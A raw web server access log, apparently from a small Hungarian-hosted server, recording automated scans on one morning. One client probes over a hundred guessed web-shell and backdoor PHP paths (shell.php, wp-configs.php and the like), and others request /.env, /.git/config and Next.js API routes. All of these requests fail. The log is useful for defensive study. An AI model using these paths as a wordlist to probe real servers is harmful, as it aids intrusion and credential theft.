+[21/Jan/2026:08:52:47 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:09:04:49 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:09:09:54 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:09:29:27 +0000] 200 - GET http 91.82.83.208 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[21/Jan/2026:09:29:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:29:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/class.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:29:59 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/lm13.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/1aa.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/menu.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/mail.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:00 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/v3.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:01 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ilex.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:01 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wto.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:01 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/777.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:01 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file88.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/flower.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ffile.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:02 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/p.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:03 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/000.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:03 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/403.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:03 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/class20.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:04 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/lol.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:04 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cc.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:04 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/o.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:04 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/aaa.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:05 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/n.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:05 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/666.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:05 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/fileas.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:05 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cccc.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:06 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/CLA.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:06 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wfile.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:06 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/abc.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:06 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wb.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:07 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/mds.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:07 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/mlex.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:07 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/a.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:08 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/a2.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:08 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/222.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:08 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/inde.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:08 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/1.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:09 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/vee.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:09 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wcas.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:09 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/k.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:10 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/finny.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:10 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ws45.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:10 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/build.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:10 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ws33.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:11 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/klex.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:11 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ws34.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:11 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/alpa.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:11 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file2.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:12 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/444.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:12 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/pp.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:12 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/2.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:12 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ws38.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:13 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/555.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:13 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/bless.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:13 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/bolt.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:13 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/error.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:14 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/he.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:14 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/cfile.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:14 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/doti.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:15 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/sko.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:15 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/gmo.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:15 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ws37.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:15 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/geck.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:16 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/nfile.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:16 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file32.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:16 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/class9.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:16 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/031.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:17 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file4.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:17 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file5.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:17 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/tx38.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:17 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/404.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:18 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/bless3.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:18 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/xxxx.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:18 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/akk.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:19 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/aa.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:19 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/x7.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:19 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ws36.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:19 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/0x0x.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:20 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/xx.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:20 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:20 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/card.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:20 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/size.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:21 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/class629.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:21 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file9.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:21 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/moon.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:22 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file18.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:22 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file21.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:22 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/xxw.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:23 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/racs3.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:23 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wsd.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:23 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/333.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:23 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/12.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:24 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/moon3.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:24 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/tor.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:24 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/haa.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:24 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/f6.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:25 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/asas.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:25 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/x.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:25 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ava.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:26 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ton.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:26 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/v1.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:26 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/111.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:27 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/an7.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:27 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/xeqdlun.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:27 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/acp.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:28 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/yellow.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:28 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/lala.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:28 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file3.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:28 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file17.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:29 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/shell.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:29 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file15.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:29 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file30.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:29 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/bless5.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:30 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-is.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:30 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/hook.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:30 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/wp-configs.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:31 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/mini.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:31 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/class19.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:31 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/plss3.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:31 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/0x.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:32 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file1.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:32 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/file8.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:32 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/100.kb.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:32 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/ppp.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:33 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/tox.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:33 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/bless11.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:33 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/030.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:33 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/v4.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:34 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/xxx.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:34 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/fs.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:34 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/33.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:34 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/v2.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:30:35 +0000] 404 - GET http 91-82-83-208.pool.digikabel.hu "/new4.php" [Client 4.197.167.136] [Length 150] [Gzip -] "-" "-" +[21/Jan/2026:09:38:08 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:09:41:03 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:09:45:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 87.121.84.46] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[21/Jan/2026:09:47:22 +0000] 404 - GET http 91.82.83.208 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:09:49:00 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:09:49:08 +0000] 200 - GET http 91.82.83.208 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:09:50:53 +0000] 400 - GET http 91.82.83.208 "/.env" [Client 157.245.196.205] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[21/Jan/2026:09:50:55 +0000] 400 - GET http 91.82.83.208 "/.git/config" [Client 157.245.196.205] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[21/Jan/2026:10:05:52 +0000] 200 - GET http 91.82.83.208 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:10:06:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:10:07:46 +0000] 200 - GET http 91.82.83.208 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:10:20:51 +0000] 405 - POST http 91.82.83.208 "/" [Client 195.178.110.25] [Length 154] [Gzip -] "Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[21/Jan/2026:10:20:51 +0000] 404 - POST http 91.82.83.208 "/_next" [Client 195.178.110.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[21/Jan/2026:10:20:51 +0000] 404 - POST http 91.82.83.208 "/api" [Client 195.178.110.25] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[21/Jan/2026:10:20:52 +0000] 404 - POST http 91.82.83.208 "/_next/server" [Client 195.178.110.25] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[21/Jan/2026:10:20:52 +0000] 404 - POST http 91.82.83.208 "/app" [Client 195.178.110.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; CrOS x86_64 14541.0.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[21/Jan/2026:10:20:52 +0000] 404 - POST http 91.82.83.208 "/api/route" [Client 195.178.110.25] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.6998.135 Mobile Safari/537.36" "-" +[21/Jan/2026:10:23:14 +0000] 400 - GET http 91.82.83.208 "/" [Client 92.63.197.197] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.91 Safari/537.36" "-" +[21/Jan/2026:10:29:13 +0000] 200 - GET http 91.82.83.208 "/" [Client 170.106.148.137] [Length 568] [Gzip 1.86] "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1" "-" +[21/Jan/2026:10:30:55 +0000] 400 - GET http 91.82.83.208 "/" [Client 185.242.226.107] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36" "-" +[21/Jan/2026:10:32:58 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[21/Jan/2026:10:42:49 +0000] 200 - GET http 91.82.83.208 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 